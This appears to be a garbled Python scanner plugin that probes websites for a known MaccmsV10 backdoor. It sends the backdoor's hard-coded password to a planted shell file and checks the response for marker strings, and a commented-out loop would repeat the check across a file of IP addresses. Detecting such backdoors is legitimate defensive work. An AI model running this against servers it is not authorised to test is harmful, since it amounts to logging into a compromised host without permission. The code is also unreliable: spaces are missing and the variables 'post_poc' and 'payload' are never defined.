defaudit(arg, package=None): scheme, url, port = parse_url(arg) if port isNoneand scheme == 'https': port = 443 elif port isNoneand scheme == 'http': port = 80 else: port = port Res_url = parse_port(scheme,url,port)
try: res = requests.session() Response = res.post(post_poc,data={'getpwd':"WorldFilledWithLove"},timeout=10,verify=False) if Response.status_code == 200andr"RDovcGhwc3R1ZHlfcHJvL1dXVy9tYWNjbXMxMC9leHRlbmQvUWNsb3VkL1Ntcy8"in Response.text andr'RDovcGhwc3R1ZHlfcHJvL1dXVy9tYWNjbXMxMC9leHRlbmQvUWNsb3VkL1Ntcy8'in Response.text: warning_info = "{} 存在MaccmsV10 后门\r\n漏洞地址:{}\r\n{}\r\n请及时删除{}目录后门shell文件\r\n漏洞详情:\r\n{}".format(url,post_poc,payload,post_poc,Response.content[3280:10000]) if warning_info: print(warning_info)
except Exception as e: logging.warning(payload) print(e)
if __name__ == '__main__': # with open('maccms.txt','r') as file: # for ip in file.readlines(): # ip.strip() # audit(ip) audit('http://127.0.0.1/index.php?m=member&c=index&a=register&siteid=1')